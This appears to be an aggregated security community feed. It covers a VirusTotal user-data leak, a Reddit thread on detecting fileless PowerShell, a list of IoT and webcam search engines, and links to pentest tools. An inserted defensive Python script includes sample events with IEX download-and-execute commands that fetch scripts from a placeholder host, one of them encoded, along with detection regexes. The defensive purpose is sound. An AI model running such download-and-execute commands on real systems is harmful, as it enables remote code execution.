VirusTotal Leaked Data of 5,600 registered users
Better change those passwords.
Link here
🗣hawaii_brian
I feel like I see data leaks of passwords all the time. What makes it so common?
How are they supposed to be stored? Hashed and salted?
👤TheAnxiousPianist
"Users’ names and e-mail addresses have been leaked, but passwords haven’t."
I have 2FA enabled but updated my password anyhow, making it longer and more complex.
👤fmtheilig
Community notes about to get real interesting
👤GoodEbening
🎖@malwr
Help Net Security
VirusTotal leaked data of 5,600 registered users
VirusTotal has suffered a data leak, which exposed the names and email addresses of 5600 of its registered users.
Detecting Fileless PowerShell operations
I am currently doing an internship where I am pen testing a proprietary incident response/memory forensics tool. I am new to pentesting/forensics in general. One of the things I am thinking about trying is using IEX in PowerShell to download/run things. Does this leave any kind of artifacts?
What would you be checking for in something like this?
I am planning on using Atomic Red Team or Caldera. I have noticed that with ART the PowerShell commands you run are unique to that program and probably would not be typical PowerShell commands, so it is perhaps not the best way to find out what PowerShell is actually doing, but it seemed the easiest way to start testing quickly.
🗣Ghostnineone
Depending on the setup of the target organisation, using PowerShell on the target will leave logs in the "Windows PowerShell.evtx" logs in decoded form, and if more logging is in place, "PowerShell transcripts" or "Sysmon" logs may exist. Other than logs, artifacts like Prefetch, ShimCache or AmCache can provide more evidence of PowerShell execution.
👤OverZeeR
You can usually find PowerShell in the event logs.
👤smc0881
🎖@malwr
Reddit
From the computerforensics community on Reddit
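Detection logic for the log artifacts named in the replies above, added here as an example (it is not code from the thread or from any tool it mentions): it scans exported PowerShell event text for IEX-style download-and-execute patterns and decodes `-EncodedCommand` arguments so they are checked in decoded form. The event IDs (400 for engine start in the "Windows PowerShell" log, 4104 for script block logging), the record layout and the sample events are assumptions constructed for the example.

```python
import base64
import re

# Constructed sample records (not real logs). "id" is the event ID and "text"
# the exported field: 400 = engine start (HostApplication) in the
# "Windows PowerShell" log, 4104 = script block in the Operational log.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 400, "text": r"HostApplication=powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"id": 400, "text": "HostApplication=powershell.exe -NoProfile -enc " + _ENC},
    {"id": 4104, "text": "Invoke-Expression (Invoke-WebRequest -Uri http://example.test/b.ps1).Content"},
    {"id": 4104, "text": r"Get-ChildItem C:\Users | Measure-Object"},
]

EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
FETCH = re.compile(r"downloadstring|downloaddata|net\.webclient|"
                   r"invoke-webrequest|invoke-restmethod|\b(?:iwr|irm)\b", re.I)
# Any flag starting with -e followed by a long base64-looking argument.
ENCODED = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    for flag, blob in ENCODED.findall(text):
        # PowerShell accepts unambiguous prefixes (-e, -enc, ...) and -ec.
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or not UTF-16LE text
                return None
    return None


def triage(events):
    """Return (event id, reasons, effective command) for suspicious records."""
    hits = []
    for ev in events:
        decoded = decode_encoded_command(ev["text"])
        command = decoded or ev["text"]
        reasons = ["encoded-command"] if decoded else []
        if EXEC.search(command) and FETCH.search(command):
            reasons.append("download-and-execute")
        if reasons:
            hits.append((ev["id"], reasons, command))
    return hits


if __name__ == "__main__":
    for event_id, reasons, command in triage(SAMPLE_EVENTS):
        print(event_id, ",".join(reasons), "|", command)
```

The pattern lists are a starting point for triage, not a complete signature set; benign administration scripts can match them and need review in context.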
The Tool List of IoT (Internet of Things) Device Search Engines
Internet Of Things (IoT) devices search engines
[Shodan](https://www.shodan.io/)
Criminal IP
[Airport webcams](http://airportwebcams.net/)
Insecam
[Lookr](https://www.lookr.com/)
Earthcam
[Openstreetcam](https://www.openstreetcam.org/map/)
Opentopia
[Pictimo](https://www.pictimo.com/)
Thingful
[Webcam.nl (NL)](https://webcam.nl/live_streaming/)
Webcams.travel
[Worldcam](https://worldcam.eu/)
Censys
These tools can be utilized for discovering exposed IoT devices and detecting their vulnerabilities, open ports, etc.
Source: https://osint.link/
🗣talentSA112200
🎖@malwr
Shodan
Search engine of Internet-connected devices. Create a free account to get started.
citrixInspector: Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519
🗣digicat
What are the experiences with the IoC checks so far?
👤Alert-Sale2153
🎖@malwr
GitHub
Accurately fingerprint and detect vulnerable (and patched!) versions of Netscaler / Citrix ADC to CVE-2023-3519 - securekomodo/citrixInspector
PurpleKeep: Providing Azure pipelines to create an infrastructure and run Atomic tests.
🗣digicat
🎖@malwr
GitHub
GitHub - Retrospected/PurpleKeep: Providing Azure pipelines to create an infrastructure and run Atomic tests.
apk2url - Tool to gather endpoints from an APK
apk2url is a tool that can be useful for developers, pentesters and redteamers for information gathering purposes. This tool gathers IP and URL endpoints from an APK using decompiling and disassembly.
You never know what you can find =)
Try it out:
https://github.com/n0mi1k/apk2url
🗣n0mi1k
Thanks for sharing, I’ll have to check this out!
Any idea on if it captures deeplinks too?
Edit: just saw you wrote it, I’ll give it a go and pass any suggestions if you’d like.
👤Killco_Joe
🎖@malwr
GitHub
GitHub - n0mi1k/apk2url: An OSINT tool to quickly extract IP and URL endpoints from APKs by disassembling and decompiling